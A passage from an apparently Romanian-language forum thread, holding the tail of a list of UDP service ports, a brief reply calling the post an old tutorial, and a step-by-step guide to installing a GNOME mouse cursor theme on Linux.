doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established) ntalk 518/udp utime 519/udp unixtime router 520/udp local routing process (on site); uses variant of Xerox NS routing information protocol timed 525/udp timeserver netwall 533/udp for emergency broadcasts new-rwho 550/udp new-who rmonitor 560/udp rmonitord monitor 561/udp meter 571/udp udemon elcsd 704/udp errlog copy/server daemon loadav 750/udp vid 769/udp cadlock 770/udp notify 773/udp acmaint_dbd 774/udp acmaint_trnsd 775/udp wpages 776/udp puparp 998/udp applix 999/udp Applix ac puprouter 999/udp cadlock 1000/udp hermes 1248/udp wizard 2001/udp curry globe 2002/udp emce 2004/udp CCWS mm conf oracle 2005/udp raid-cc 2006/udp raid raid-am 2007/udp terminaldb 2008/udp whosockami 2009/udp pipe_server 2010/udp servserv 2011/udp raid-ac 2012/udp raid-cd 2013/udp raid-sf 2014/udp raid-cs 2015/udp bootserver 2016/udp bootclient 2017/udp rellpack 2018/udp about 2019/udp xinupagesrver 2020/udp xinuexpnsion1 2021/udp xinuexpnsion2 2022/udp xinuexpnsion3 2023/udp xinuexpnsion4 2024/udp xribs 2025/udp scrabble 2026/udp isis 2042/udp isis-bcast 2043/udp rimsl 2044/udp cdfunc 2045/udp sdfunc 2046/udp dls 2047/udp shilp 2049/udp rmontor_scure 5145/udp xdsxdm 6558/udp isode-dua 17007/udp Enj0y!
  23. e vechi tut ... si cand dai la romani sa asculte le dai si ip-ul ??? gandestete mai bine
  24. 1) Download "mouse theme" you like : -> gnome-look ( http://www.gnome-look.org/index.php?xcontentmode=36 ) 2) Copy(as root) downloaded archived file in /usr/share/icons: cp example.tar.bz2 /usr/share/icons/ 3) Go to that directory and unpack the archive: tar xvfj example.tar.bz2 The directory with your icon name should be created here.(/usr/share/icons/Example) Note: Some icon themes come with two or three different colors, so extracted directory will contain subfolders name like "Black" "White" "Blue" .... You should move subfolder to /usr/share/icons/ directory like this: mv /usr/share/icons/Example/Black /usr/share/icons/ Now the /usr/share/icons/Black foder is here where it should be. 4) Edit the file with your text editor located in /usr/share/icons/default/index.theme gedit /usr/share/icons/default/index.theme Change the line "Inherits=Bluecurve" to whatever your new mouse icon theme directory is named. (Inherits=Example, Inherits=Black, Inherits=Blue,...) 5) Save the file and log out of your session. When you login, the new mouse icon theme should be in use. Bafta!
×
×
  • Create New...